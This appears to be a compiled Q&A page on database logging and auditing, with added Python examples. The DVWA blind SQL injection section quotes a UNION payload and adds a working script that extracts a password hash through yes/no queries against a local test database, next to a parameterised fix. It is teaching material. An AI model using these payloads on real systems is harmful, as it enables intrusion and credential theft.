GCP Pub/Sub logs for internal cloudsqladmin user show query fragments / partial data - postgresql

When exporting logs to Pub/Sub (via a Sink, Topic and Subscription) from a GCP PostgreSQL server (v11), some lines auditing the internal cloudsqladmin user return what seem to be fragments of SQL queries run on the server. I am looking at them in the Logs Viewer.
Examples:
db=cloudsqladmin,user=cloudsqladmin LOG: 00000: statement: WITH max_age AS ("
textPayload: "2020-11-10 23:30:01.188 UTC [*****]: [5-1] db=*********,user=cloudsqladmin LOG: 00000: statement: ;"
timestamp: "2020-11-10T23:30:01.188675Z"
It seems to be part of a longer query, but I can't logically attach it to any other adjacent log line.
Does this look like a bug on the GCP side, or am I missing something else here?
Screenshots:

I tried several flags, even the pgAudit beta flags, and I didn't find a way to flatten the logs. In fact, when you write a multi-line query (which is the case here with Cloud SQL, but also the case if you write your app with multi-line logs), it's logged as multiple lines and produces multiple single-line log entries.
If you sink the logs into Pub/Sub, you get a message per entry, and if you have multi-line logs, you get multiple messages.
You can mitigate the issue by removing the useless log traces (system traces, increasing the log level, ...) and inlining your business queries to have nice logs.
It's a built-in issue; it's worth filing a case here.

If you click on the left arrow of any of the logs you are interested in, and then click on "Expand nested fields", you will see your complete query in that log (among other information).
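The two answers above describe the mechanism (one Pub/Sub message per log line, so a multi-line statement arrives as several messages) and the mitigation (drop the platform's own traces, keep your application's). The script below is an added example, not code from the question or the answers: it parses the `textPayload` prefix as it appears in the quoted lines, stitches fragments that share the same `[pid]` and `[seq]` back into one statement, and then discards the `cloudsqladmin` entries. The prefix layout, the use of `(pid, seq)` as the statement key, the repeated `-1` chunk number, and the sample messages are all assumptions built from the question's samples, not Cloud SQL documentation.

```python
import json
import re
from collections import OrderedDict

# Prefix layout assumed from the lines quoted in the question:
#   "<date> <time> UTC [<pid>]: [<seq>-<chunk>] db=<db>,user=<user> LOG: 00000: statement: <sql>"
PREFIX_RE = re.compile(
    r"^(?P<date>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d+ UTC) "
    r"\[(?P<pid>\d+)\]: \[(?P<seq>\d+)-(?P<chunk>\d+)\] "
    r"db=(?P<db>[^,]*),user=(?P<user>\S+) (?P<rest>.*)$"
)
STATEMENT_MARK = "LOG: 00000: statement: "


def parse_line(text_payload):
    """Return the prefix fields plus the statement fragment, or None for non-statement lines."""
    m = PREFIX_RE.match(text_payload)
    if m is None:
        return None
    fields = m.groupdict()
    rest = fields.pop("rest")
    if not rest.startswith(STATEMENT_MARK):
        return None  # connection/checkpoint/... lines are not what we are stitching
    fields["fragment"] = rest[len(STATEMENT_MARK):]
    return fields


def reassemble(messages):
    """messages: Pub/Sub message bodies (LogEntry JSON strings) in delivery order.

    Assumption: every line of one multi-line statement repeats the same [pid] and [seq],
    as in the question's samples, so (pid, seq) identifies the statement. Fragments are
    re-joined in (timestamp, chunk, arrival) order, so out-of-order delivery is tolerated.
    """
    groups = OrderedDict()
    for idx, body in enumerate(messages):
        entry = json.loads(body)
        parsed = parse_line(entry.get("textPayload", ""))
        if parsed is None:
            continue
        key = (parsed["pid"], parsed["seq"])
        rec = groups.setdefault(key, {"db": parsed["db"], "user": parsed["user"], "parts": []})
        rec["parts"].append((entry["timestamp"], int(parsed["chunk"]), idx, parsed["fragment"]))
    records = []
    for rec in groups.values():
        parts = sorted(rec["parts"])
        records.append({
            "db": rec["db"],
            "user": rec["user"],
            "timestamp": parts[0][0],
            "statement": "\n".join(p[3] for p in parts),
        })
    return records


def drop_internal(records, internal_users=("cloudsqladmin",)):
    """The answer's mitigation: discard the platform's own maintenance statements."""
    return [r for r in records if r["user"] not in internal_users]


def _entry(ts, pid, seq, chunk, db, user, sql):
    """Constructed LogEntry body in the shape the Pub/Sub sink delivers (sample data)."""
    text = (f"{ts[:10]} {ts[11:23]} UTC [{pid}]: [{seq}-{chunk}] "
            f"db={db},user={user} {STATEMENT_MARK}{sql}")
    return json.dumps({"textPayload": text, "timestamp": ts})


# Constructed sample: one 5-line internal statement, interleaved with an application
# statement, with two internal fragments delivered out of order.
INTERNAL_SQL = [
    "WITH max_age AS (",
    "  SELECT now() - interval '1 day' AS cutoff",
    ")",
    "SELECT cutoff FROM max_age",
    ";",
]
SAMPLE_MESSAGES = [
    _entry("2020-11-10T23:30:01.188675Z", 4242, 5, 1, "cloudsqladmin", "cloudsqladmin", INTERNAL_SQL[0]),
    _entry("2020-11-10T23:30:01.190002Z", 9001, 12, 1, "app", "app_user", "SELECT * FROM users WHERE id = $1;"),
    _entry("2020-11-10T23:30:01.188690Z", 4242, 5, 1, "cloudsqladmin", "cloudsqladmin", INTERNAL_SQL[2]),
    _entry("2020-11-10T23:30:01.188680Z", 4242, 5, 1, "cloudsqladmin", "cloudsqladmin", INTERNAL_SQL[1]),
    _entry("2020-11-10T23:30:01.188700Z", 4242, 5, 1, "cloudsqladmin", "cloudsqladmin", INTERNAL_SQL[3]),
    _entry("2020-11-10T23:30:01.188710Z", 4242, 5, 1, "cloudsqladmin", "cloudsqladmin", INTERNAL_SQL[4]),
]

if __name__ == "__main__":
    for r in drop_internal(reassemble(SAMPLE_MESSAGES)):
        print(r["timestamp"], r["user"], r["statement"], sep="  ")
```

Sorting by timestamp inside a group matters because a Pub/Sub subscription does not preserve order unless ordering keys are used; if two fragments carry the identical timestamp (as in the question's samples), the chunk number and then arrival order decide.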

Related

AWS Cloudwatch: How to add the instance name / custom fields to the log?

We currently have multiple CloudWatch log streams per EC2 instance. This is horrible to debug; queries for "ERROR XY" across all instances would involve either digging into each log stream (time-consuming) or using the AWS CLI (time-consuming queries).
I would prefer to have a log stream combining the log data of all instances of a specific type, let's say all "webserver" instances log their "apache2" log data to one central stream and "php" log data to another central stream.
Obviously, I still want to be able to figure out which log entry stems from which instance - as I would be with central logging via syslogd.
How can I add the custom field "instance id" to the logs in cloudwatch?
The best way to organize logs in CloudWatch Logs is as follows:
The log group represents the log type. For example: webserver/prod.
The log stream represents the instance id (i.e. the source).
For querying, I highly recommend using the Insights feature (I helped build it when I worked at AWS). The log stream name will be available with each log record as a special @logStream field.
You can query across all instances like this:
filter @message like /ERROR XY/
Or inside one instance like this:
filter @message like /ERROR XY/ and @logStream = "instance_id"

Orientdb: Error executing live query subscriber

OrientDB throws the following NullPointerException on each live query subscription using the binary protocol:
Error executing live query subscriber. java.lang.NullPointerException at com.orientechnologies.orient.server.network.protocol.binary.OLiveCommandResultListener.onLiveResult(OLiveCommandResultListener.java:113)
at com.orientechnologies.orient.core.sql.OCommandExecutorSQLLiveSelect$2.call(OCommandExecutorSQLLiveSelect.java:134)
at com.orientechnologies.orient.core.sql.OCommandExecutorSQLLiveSelect.execInSeparateDatabase(OCommandExecutorSQLLiveSelect.java:144)
at com.orientechnologies.orient.core.sql.OCommandExecutorSQLLiveSelect.onLiveResult(OCommandExecutorSQLLiveSelect.java:131)
at com.orientechnologies.orient.core.query.live.OLiveQueryQueueThread.run(OLiveQueryQueueThread.java:69)
The live query is subscribed by one client: "live select from Account where CheckInDateTime like "2018-02-25%"", and OrientDB also returns the live request token ID gracefully. But when another client updates Account with "update Account set CheckInDateTime = "2018-02-25 13:00:00"", the mentioned NullPointerException is thrown. I've tried versions 2.2.30 and 2.2.32 Community, with DB Administrator and Server Administrator accounts. Also, loading of plugins seems not to work (even though the versions used are 2.2.30 and 2.2.32, where Live Query should be enabled on the server by default). Nothing seems to help to get that working, not even queries like "live select from account" (without where ...).
Any further ideas? Thx.
Currently live queries do not support the WHERE clause you included in the query.
You can only select entire collections or V and E (which is what I use to get all updates)
If you would like to filter using that where, you will have to write it yourself in code.
Thx for answering, mitchken! Fortunately, I found the mistake. The TCP connection from client to DB was in the wrong state (it must be in waitforreadyread the whole time).

Unable to practice Sql Injection (blind) on DVWA 1.10

I am practicing for Security Testing. I came across DVWA and I started practicing for Sql Injection. I was doing fine till I started with SQL Injection (blind). No matter which query I try I am not getting the desired result.
For eg :
1' and 1=0 union select null,table_name from information_schema.tables#
simply returns User ID exists in the database.
I have set the DVWA Security to Low. Also made sure there are no errors on setup page of the application under Setup Check section.
Following are environment details:
Operating system: Windows
Backend database: MySQL
PHP version: 5.6.16
I think the answer is here and the behavior is expected
https://github.com/ethicalhack3r/DVWA/issues/12
Someone complained of the opposite behavior and the developer agreed, and a contributor named g0tm1lk fixed it. He made the exercise really "blind" and we have to use blind injection methods to test the vulnerability.
Showing the SQL error messages to the user is just: a SQL injection vuln + a misconfiguration issue.
A blind SQL injection might occur when the columns of the results returned by a query are not shown to the user. However, the user can tell somehow if the query returned any records or none.
E.g.: Suppose the url "http://www.example.com/user?id=USER_ID" returns:
200 if USER_ID exists
404 if USER_ID does not exist
But it won't show any information from the query results (e.g. username, address, phone, etc)
If the page is vulnerable to [blind] SQLi, an attacker won't be able to get info from the DB printed in the result page, but he might be able to infer it by asking yes/no questions.
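The answer's point is that a truly blind page leaks one bit per request ("exists" / "missing"), so a UNION payload like the one in the question shows nothing, but a yes/no oracle still recovers data. The script below is an added example, not DVWA's code: it builds a constructed SQLite stand-in for the blind check (the page's string-built query beside its parameterised fix), then recovers a password hash character by character with a binary search over `unicode(substr(...))`, asking only exists/missing questions. The schema, the sample rows and the `--` comment terminator are assumptions for SQLite; DVWA's MySQL backend would take `#`, as in the question's own payload.

```python
import hashlib
import sqlite3


# Constructed stand-in for the blind page's users table (not DVWA's real schema or data).
def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER PRIMARY KEY, first_name TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", [
        (1, "admin", hashlib.md5(b"password").hexdigest()),
        (2, "gordonb", hashlib.md5(b"abc123").hexdigest()),
    ])
    return conn


def user_exists_vulnerable(conn, user_id):
    """The blind page as the answer describes it: no row data is shown, only exists/missing."""
    sql = f"SELECT first_name FROM users WHERE user_id = '{user_id}'"  # string-built: injectable
    return conn.execute(sql).fetchone() is not None


def user_exists_fixed(conn, user_id):
    """Same check with a bound parameter; the input can no longer change the query's logic."""
    row = conn.execute("SELECT first_name FROM users WHERE user_id = ?", (user_id,)).fetchone()
    return row is not None


def _find_int(ask_le, lo, hi):
    """Binary search: smallest v in [lo, hi] for which ask_le(v) ('value <= v') is true."""
    while lo < hi:
        mid = (lo + hi) // 2
        if ask_le(mid):
            hi = mid
        else:
            lo = mid + 1
    return lo


def blind_extract(oracle, expr, max_len=256):
    """Recover the scalar that `expr` evaluates to, one yes/no question at a time.

    oracle(payload) -> bool is the page's exists/missing answer. Each payload closes the
    quoted literal with ' and comments out the rest with -- (SQLite syntax, an assumption
    of this example; MySQL/DVWA would use #). Returns (value, number_of_requests).
    """
    queries = 0

    def ask(condition):
        nonlocal queries
        queries += 1
        return oracle(f"1' AND ({condition}) -- ")

    if not ask(f"({expr}) IS NOT NULL"):
        return "", queries  # nothing to read: NULL or no matching row
    length = _find_int(lambda v: ask(f"length(({expr})) <= {v}"), 0, max_len)
    chars = []
    for i in range(1, length + 1):
        # Printable ASCII only (32..126); a character outside that range would read as 126.
        code = _find_int(lambda v, i=i: ask(f"unicode(substr(({expr}), {i}, 1)) <= {v}"), 32, 126)
        chars.append(chr(code))
    return "".join(chars), queries


if __name__ == "__main__":
    db = build_db()
    secret, n = blind_extract(lambda p: user_exists_vulnerable(db, p),
                              "SELECT password FROM users WHERE user_id = 1")
    print(f"recovered {secret!r} with {n} requests")
```

A 32-character hash costs roughly 7 requests per character plus a few for the length, which is why boolean-based blind injection is slow but entirely practical; the parameterised `user_exists_fixed` returns "missing" for every payload because the whole input is compared as a value.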

What is the role of Logstash Shipper and Logstash Indexer in ELK stack?

I have been studying online about ELK stack for my new project.
Most of the tech blogs, though, are about how to set ELK up, and I need more information to begin with.
What is Logstash ? Further, Logstash Shipper and Indexer.
What is Elasticsearch's role ?
Any leads will be appreciated too if not a proper answer.
I will try to explain the elk stack to you with an example.
Applications generate logs which all have the same format ( timestamp | loglevel | message ) on any machine in our cluster and write those logs to some file.
Filebeat (a log shipper from ELK) tracks that file, gathers any updates to the file periodically and forwards them to Logstash over the network. Unlike Logstash, Filebeat is a lightweight application that uses very few resources, so I don't mind running it on every machine in the cluster. It notices when Logstash is down and waits with transferring data until Logstash is running again (no logs are lost).
Logstash receives messages from all log shippers through the network and applies filters to the messages. In our case it splits up each entry into timestamp, loglevel and message. These are separate fields and can later be searched easily. Any messages that do not conform to that format will get a field: invalid logformat. These messages with fields are now forwarded to Elasticsearch at a speed that Elasticsearch can handle.
Elasticsearch stores all messages and indexes (prepares for quick search) all the fields in the messages. It is our database.
We then use Kibana (also from ELK) as a GUI for accessing the logs. In Kibana I can do something like: show me all logs from between 3-5 pm today with loglevel error whose message contains MyClass. Kibana will ask Elasticsearch for the results and display them.
I don't know, if this helps, but ... whatever... Let's take some really stupid example: I want to do statistics about squirrels in my neighborhood. Every squirrel has a name and we know what they look like. Each neighbor makes a log entry whenever he sees a squirrel eating a nut.
ElasticSearch is a document database that structures data in so-called indices. It is able to save pieces (shards) of those indices redundantly on multiple servers and gives you great search functionality, so you can access huge amounts of data very quickly.
Here we might have finished events that look like this:
{
"_index": "squirrels-2018",
"_id": "zr7zejfhs7fzfud",
"_version": 1,
"_source": {
"squirrel": "Bethany",
"neighbor": "A",
"@timestamp": "2018-10-26T15:22:35.613Z",
"meal": "hazelnut"
}
}
Logstash is the data collector and transformer. It's able to accept data from many different sources (files, databases, transport protocols, ...) with its input plugins. After using one of those input plugins all the data is stored in an Event object that can be manipulated with filters (add data, remove data, load additional data from other sources). When the data has the desired format, it can be distributed to many different outputs.
If neighbor A provides a MySQL database with the columns 'squirrel', 'time' and 'ate', but neighbor B likes to write CSVs with the columns 'name', 'nut' and 'when', we can use Logstash to accept both inputs. Then we rename the fields and parse the different datetime formats those neighbors might be using. If one of them likes to call Bethany 'Beth' we can change the data here to make it consistent. Eventually we send the result to ElasticSearch (and maybe other outputs as well).
Kibana is a visualization tool. It allows you to get an overview of your index structures and server status and create diagrams for your ElasticSearch data.
Here we can do funny diagrams like 'Squirrel Sightings Per Minute' or 'Fattest Squirrel (based on nut intake)'
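The first answer walks through the pipeline stage by stage: a shipper that keeps its place in the file while Logstash is down, a filter that splits "timestamp | loglevel | message" into fields and marks nonconforming lines with "invalid logformat", a store, and the Kibana query "3-5 pm, loglevel error, message contains MyClass". The code below is an added example that models those four stages in plain Python so the data flow can be run offline; it is not Filebeat, Logstash, Elasticsearch or Kibana code, and the `Shipper`/`Indexer` classes, the `tags` field and the sample log lines are constructed for this illustration.

```python
import re
from datetime import datetime

# Line format from the answer: "timestamp | loglevel | message"
LINE_RE = re.compile(r"^(?P<ts>\S+) \| (?P<level>[A-Z]+) \| (?P<msg>.*)$")


def _ts(iso):
    """ISO-8601 with a trailing Z -> aware datetime."""
    return datetime.fromisoformat(iso.replace("Z", "+00:00"))


def parse_event(raw, source):
    """The Logstash filter step: split one shipped line into fields, or tag it invalid."""
    event = {"source": source, "message": raw}
    m = LINE_RE.match(raw)
    if m is None:
        event["tags"] = ["invalid logformat"]
        return event
    try:
        stamp = _ts(m["ts"])
    except ValueError:  # right shape, but the timestamp does not parse
        event["tags"] = ["invalid logformat"]
        return event
    event.update({"@timestamp": stamp, "loglevel": m["level"], "message": m["msg"]})
    return event


class Shipper:
    """Filebeat-like: remembers its offset into the file, so an outage downstream loses nothing."""

    def __init__(self, source):
        self.source = source
        self.offset = 0

    def ship(self, lines, indexer):
        while self.offset < len(lines):
            try:
                indexer.ingest(parse_event(lines[self.offset], self.source))
            except ConnectionError:
                return False  # downstream is down: keep the offset and retry later
            self.offset += 1
        return True


class Indexer:
    """Elasticsearch-like store with the one query Kibana would run for the answer's example."""

    def __init__(self):
        self.docs = []
        self.up = True

    def ingest(self, event):
        if not self.up:
            raise ConnectionError("logstash/elasticsearch unreachable")
        self.docs.append(event)

    def search(self, start_iso, end_iso, loglevel=None, contains=None):
        start, end = _ts(start_iso), _ts(end_iso)
        hits = []
        for d in self.docs:
            if "@timestamp" not in d or not (start <= d["@timestamp"] <= end):
                continue  # invalid-format docs have no timestamp and never match a time range
            if loglevel is not None and d.get("loglevel") != loglevel:
                continue
            if contains is not None and contains not in d["message"]:
                continue
            hits.append(d)
        return hits


# Constructed sample lines from one host; the third one breaks the format on purpose.
SAMPLE_LINES = [
    "2018-10-26T15:22:35Z | INFO | MyClass started",
    "2018-10-26T15:40:10Z | ERROR | MyClass failed to open socket",
    "this line has no pipes at all",
    "2018-10-26T16:05:00Z | ERROR | OtherClass timeout",
    "2018-10-26T17:30:00Z | ERROR | MyClass crashed",
]

if __name__ == "__main__":
    idx = Indexer()
    Shipper("web-01").ship(SAMPLE_LINES, idx)
    for hit in idx.search("2018-10-26T15:00:00Z", "2018-10-26T17:00:00Z", loglevel="ERROR", contains="MyClass"):
        print(hit["@timestamp"], hit["loglevel"], hit["message"])
```

The invalid line is kept rather than dropped, with a tag you can alert on; silently discarding lines that fail a grok pattern is how an attacker's oddly formatted request disappears from the log.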

Can I log the script that invokes DELETE query?

I have to investigate who or what caused tables rows to disappear.
So, I am thinking about creating an "on before delete" trigger that logs the script that invokes the deletion. Is this possible? Can I get the DB client name or, even better, the script that invokes the delete query, and log it to another, temporarily created log table?
I am open to other solutions, too.
Thanks in advance!
You can't get "the script" which issued the delete statement, but you can get various other information:
current_user will return the current Postgres user that initiated the delete statement
inet_client_addr() will return the IP address of the client's computer
current_query() will return the complete statement that caused the trigger to fire
More details about those kinds of functions are available in the manual:
http://www.postgresql.org/docs/current/static/functions-info.html
The Postgres Wiki contains two examples of such an audit trigger:
https://wiki.postgresql.org/wiki/Audit_trigger_91plus
https://wiki.postgresql.org/wiki/Audit_trigger (somewhat outdated)
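The mechanism the answer points at is a BEFORE DELETE trigger that copies what is about to vanish into a separate audit table. The code below is an added example, not the wiki's audit trigger: it installs such a trigger with Python's bundled SQLite so the behaviour can be run offline, using a constructed `orders` table and a `delete_audit` table of my own naming. SQLite has no `current_user`, `inet_client_addr()` or `current_query()`, so this example records only the old row and the time; in PostgreSQL the same trigger body, written in PL/pgSQL, would add those three values from the answer.

```python
import sqlite3

# Audit table of this example's own design (assumed name and layout).
AUDIT_DDL = """
CREATE TABLE IF NOT EXISTS delete_audit (
    id          INTEGER PRIMARY KEY,
    deleted_at  TEXT NOT NULL DEFAULT (strftime('%Y-%m-%dT%H:%M:%fZ', 'now')),
    table_name  TEXT NOT NULL,
    row_id      INTEGER NOT NULL,
    old_row     TEXT NOT NULL
)
"""


def install_audit_trigger(conn, table, pk, columns):
    """Create a BEFORE DELETE trigger on `table` that copies the old row into delete_audit.

    `table`, `pk` and `columns` are identifiers supplied by the code that owns the schema,
    never by users, which is the only reason they may be interpolated into DDL here.
    """
    old_row = " || ',' || ".join(f"'{c}=' || quote(OLD.{c})" for c in columns)
    conn.execute(AUDIT_DDL)
    conn.execute(f"""
        CREATE TRIGGER IF NOT EXISTS audit_delete_{table}
        BEFORE DELETE ON {table}
        BEGIN
            INSERT INTO delete_audit (table_name, row_id, old_row)
            VALUES ('{table}', OLD.{pk}, {old_row});
        END
    """)


def audit_rows(conn):
    """What an investigator reads afterwards: which rows disappeared, in order."""
    return conn.execute(
        "SELECT table_name, row_id, old_row FROM delete_audit ORDER BY id"
    ).fetchall()


def demo():
    """Constructed scenario: two orders, one bulk DELETE, one audit record per deleted row."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE orders (id INTEGER PRIMARY KEY, customer TEXT, amount_cents INTEGER)")
    conn.executemany("INSERT INTO orders VALUES (?, ?, ?)", [(1, "acme", 1050), (2, "globex", 9900)])
    install_audit_trigger(conn, "orders", "id", ["customer", "amount_cents"])
    conn.execute("DELETE FROM orders WHERE amount_cents > 5000")
    conn.commit()
    return audit_rows(conn)


if __name__ == "__main__":
    for table, row_id, old in demo():
        print(f"{table}#{row_id}: {old}")
```

Two practical points carry over to PostgreSQL: the role doing the deleting must be able to insert into the audit table but should not be able to delete from it (a SECURITY DEFINER trigger function owned by a separate role handles that), and `current_query()` gives you the statement, not the script that sent it, so if you need the caller, have each application set a distinct `application_name` on its connection and record `current_setting('application_name')` alongside.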